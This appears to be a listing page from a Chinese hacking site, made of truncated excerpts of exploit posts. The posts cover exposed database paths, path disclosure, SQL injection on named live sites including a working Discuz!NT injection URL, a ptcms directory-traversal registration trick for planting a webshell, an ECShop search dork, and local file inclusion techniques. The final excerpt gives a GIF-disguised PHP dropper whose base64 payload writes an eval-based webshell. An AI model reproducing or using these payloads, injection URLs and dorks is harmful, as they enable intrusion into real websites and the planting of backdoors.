COCOON Counter统计程序漏洞总结
一、默认数据库: counter/_db/db_CC_Counter6.mdb 也可直接打开:https://www.webshell.cc/Counter/utilities/update.asp 查看源文件,查找<! ,就可以找到数据库的地址。程序的问题。 二、暴路径漏洞 利用探针https://www.webshell.cc/Counter/utilities/aspSysCheck.as...
很久以前的EXP 74cms 漏洞!
不解释了! <?php /* 骑士CMS漏洞利用Exp Author:mer4en7y[90sec Team] Home:www.90sec.org 声明:漏洞发现者:毅心毅意(发布在t00ls) 在日站的时候,碰到了这个系统,于是搞了这么个EXP, 水平有限,写的粗糙了点,忘大牛无见笑 大部分代码参考了子仪牛 */ /*利用方法:$host:主机,$user修改为注册的用户名 $pwd修改...
申通快递官网爆注入漏洞
刚才去申通快递官网查询一个邮件,点了一个链接,然后习惯性的检测了下,然后就发现了这个蛋疼的注入漏洞,如上图所示。 这是一个很明显的 Sql Inject,结构为:Asp + Mysql,而且这几个管理员密码居然还是明文的…… 后来又去检查了下其他页面,发现该站实际上到处都是注入漏洞,本人表示相当的无语…… 该程序缺陷已通知申通快递官方,请各位同学不要继续搞了,免引起不必要的麻烦。。。。。。 同时坐...
DNT存在SQL注入漏洞
注入地址: http://nt.discuz.net/space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1 利用: http://nt.discuz.net/space/manage/ajax.aspx?AjaxTemplate=../../admin/usercon...
ptcms小说小偷程序 最新EXP漏洞
于没有带到数据库检测 而是直接验证程序内有没有这个文件名的文件夹, 那么我们注册../../1.asp; 或者../../2.asp 然后在书架或者收藏哪里插入一句话, 对应的木马地址是 https://www.webshell.cc/1.asp/mark.ptv ps://针对解析漏洞的 鸡肋 下面放出落叶的exp 怕在下面大家看不到哈。 <?php //error_repor...
ptcms小说小偷程序鸡肋漏洞
看了一下最新的ptcms小说小偷程序 ,发现之前的漏洞已经修补了,那么先看下如何修补这些漏洞的! 看注册文件上次的写入资料 exit(); } include '../data/user.php'; $username=$_POST['username']; //写入资料信息 $str=$password."\n".time()."\n".$_SERVER["REMOTE_ADDR"]; $fil...
ECShop v2.7.2 wap页面暴路径漏洞
谷歌百度一下:inurl:mobile/goods.php?act=view_img&id=123 搜到后在页面加个&id=5 也就是https://www.webshell.cc/mobile/goods.php?act=view_img&id=123&id=5
利用phpinfo信息LFI临时文件
还记得之前国外某牛提出的LFI包含临时文件么? 当时确实觉得有些鸡肋,因为临时文件的路径及名字是未知的,虽然临时文件的名字可以利用类似<>*?等通配符(我们暂且称其为通配符)匹配,而同时N个人一起请求的话可能同时生成很多临时文件,因此用通配符也不一定能匹配成,而且临时文件保存的路径也只能靠猜。 我们知道在向服务器上任意php文件post请求上传数据时,都会生成临时文件,以前不知道临时文...
LFI漏洞利用总结
主要涉及到的函数 include(),require()、include_once(),require_once() magic_quotes_gpc()、allow_url_fopen()、allow_url_include()、move_uploaded_file() 、readfile() file()、and file_get_contents()、upload_tmp_dir()、 po...
LFI漏洞使用心得
1.找到LFI本地包含的漏洞 2.想办法上传不管是通过bbs,FCKEDITOR或者其他任何方式 3.使用如下代码 gif89a0<?fputs(fopen("3.php", "w"), base64_decode("JTNDJTNGcGhwJTIwQGV2YWwlMjglMjRfUE9TVCU1Qm5vdGhhY2slNUQlMjklM0IlM0YlM0U="));?> ...